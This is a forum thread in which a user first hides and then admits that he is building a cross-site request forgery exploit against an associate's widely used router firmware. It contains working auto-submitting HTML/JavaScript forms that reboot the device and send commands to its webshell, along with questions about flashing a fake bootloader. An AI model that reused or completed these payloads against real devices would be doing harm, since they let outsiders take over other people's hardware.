File Input Alternative Options

[sudobash]

I am not an HTML/Javascript guy, I like Assembler/C/C++ so I need some help from you WEB guys!

Basically what I want is instead of prompting user for file to input I want to specify my own file from the internet and skip the whole INPUT Box that pops up.

<form action="bootloader.cgi" method="post" name="bootloader" enctype="multipart/form-data">
<input type="file" name="filename" />
<input type="button" value="Upload" onclick="document.bootloader.submit()" />

Thanks

[Brian Chandler]

I believe that for (obvious!) security reasons you can't just specify the file the user is going to send you. Why are you trying to do this anyway?

[sudobash]

I can change the code to whatever I want it doesn't have to be an INPUT BOX, but needs to be submitted via FORM I am wanting to change it to use a static file instead of an INPUT file. I want to change it so it is not input from a PC but rather a static file at the home website. I am modifying firmware that my company has just purchased.

[sudobash]

Basically I need a replacement that works with the above form but substitutes the INPUT Box for a URL to the firmware binary that is going to be hosted on the company website.

[pandy]

I'm confused. Do you want the form to "upload" a file that's already on the server or just the URL to it? In either case why? You already have one and know the other.

[Brian Chandler]

Basically I need a replacement that works with the above form but substitutes the INPUT Box for a URL to the firmware binary that is going to be hosted on the company website.

Unfortunately I simply can't guess what you mean from the form. Suppose J Soap, member of the public, visits your website, and submits this form. What should then happen? (E.g. "A binary file should be installed on Soap's computer")

[sudobash]

Alright I might as well just come clean, you all aren't stupid. I am developing a CSRF Exploit as a proof of concept to prove that an associate needs to secure his homemade firmware (thousands of ppl use it). I am showing him that it is possible to overwrite his firmware with a Cross Site Request Forgery attack. I have been successful in resetting the unit ( I have my own unit for testing) and I know it is possible to do more with the right POST FORM. The web server does not protect against CSRF and is vulnerable to software overwrite if done correctly. Here is the FORM to restart from remote (Victim must click link to this page):

<html>
<head>
<title>Test for CSRF</title>
</head>

<body>

<form name="csrf" method="post" action="http://192.168.100.1/reboot.html";>
<input type="hidden" name="reboot" value="true">
</form>

<script>document.csrf.submit()</script>

</body>
</html>


Now instead of just rebooting the unit, which is annoying but only for about a minute. I am certain that with the right HTML/Javascript the actual firmware or bootloader could be overwritten, and then there will be a real reason to upgrade the firmware to be more secure. We can fix this overwrites with in 15 minutes but I am doing this to prove that the software needs to be upgraded since it hasn't in many months. If you want more information PM me and I will inform you of which firmware I am speaking.

This post has been edited by sudobash: Jun 6 2010, 09:01 AM

[sudobash]

I was going after the bootloader because it will be quicker to flash (repair) and cause less damage.

[sudobash]

So if you see what I am saying now, instead of picking a file from the PC it needs to pull the fake bootloader image from the internet and use it instead of the input file when it is submitting bootloader to the unit with the POST FORM. Now I have been as truthful as I can be and if you don't want to help me I will figure it out eventually when I take the time...

This post has been edited by sudobash: Jun 6 2010, 09:14 AM

[sudobash]

I guess this would be a combination of CSRF and CSFU Cross Site File Upload...

[Brian Chandler]

OK, so you mean that (eg) http://192.168.100.1 is the (local) web address for my gizmo (modem, whatever), and sending various POST arguments to this address causes various updates to the gizmo. One such is updating the firmware, which I do by downloading the new version from the Web, then submitting the form, with a file upload box, in which I select the file I've just downloaded. Right?

In such cases, of course, it would be helpful if the (genuine) web form could select the file automatically, but as we've said this is generally blocked to reduce accidents.

But if the authentication is weak (just using a cookie for example) a malicious page only has to make a POST request disguised as something else. As I recall, the uploaded file is handled by a completely different mechanism from simple POST or GET arguments. So on the face of it, you can't fake uploading a file unless the browser knows it's uploading a file, which it normally does by showing the file selection dialog box.

In particular, the system is designed explicitly so you can't "pull the fake bootloader image from the internet and use it instead of the input file". Of course I am not an expert in this, so I can't say there is no way to break it, but I don't believe any simple combination of "Javascript and HTML" is going to do it.

[sudobash]

I wire sharked an update of the bootloader and and firmware upgrade procedures and it is definitely not using GET or POST but something completely different like you said, so I decided to go another route. The device I am using has a webshell interface that is vulnerable to CSRF, as is all it's pages... Here is the code that I have come up with so far:

<html>
<head>
</head>
<body>
<form name="webshell" method="post" action="http://192.168.100.1/webshell.cgi">
<input type="hidden" id="webshell" name="command">
</form>
<script>
test = "read_memory 0x80101010";
webshell.value = escape(test);
document.webshell.submit();
</script>
</body>
</html>

The problem that I am having now is that instead of POSTING like the normal page does, instead it is giving me an error that I verified with wireshark as a url encoding problem... My commands whether it is LS, read_memory, or write_memory, the commands themselves work and return either data or an error requiring more parameters, but when I add the parameters that is when the encoding problems occur. Example:
read_memory by itself will return Missing Address to READ
read_memory 0x80000000 will return an error saying Command not found: read_memory%200x80000000

I need the POST form to actually be transmitted as %20 and not +

I am going to post what I found in both wireshark POST's:

Correct:
63 6f 6d 6d 61 6e 64 3d 72 65 61 64 5f 6d 65 6d 6f 72 79 25 32 30 30 78 38 30 30 30 30 30 30 30

Which means:
command=read_memory%200x80000000

Incorrect:
63 6f 6d 6d 61 6e 64 3d 72 65 61 64 5f 6d 65 6d 6f 72 79 25 32 35 32 30 30 78 38 30 30 30 30 30 30 30

Which means:
command=read_memory%25200x80000000


Please Someone help me out with this POSTING URL ENCODING CRAP!

This post has been edited by sudobash: Jun 11 2010, 06:19 PM

[sudobash]

If I'm not mistaken the %2520 is %20 but encoding the % as %25+ adding 20 instead of encoding the space as %20 it's %2520? Someone please help me out?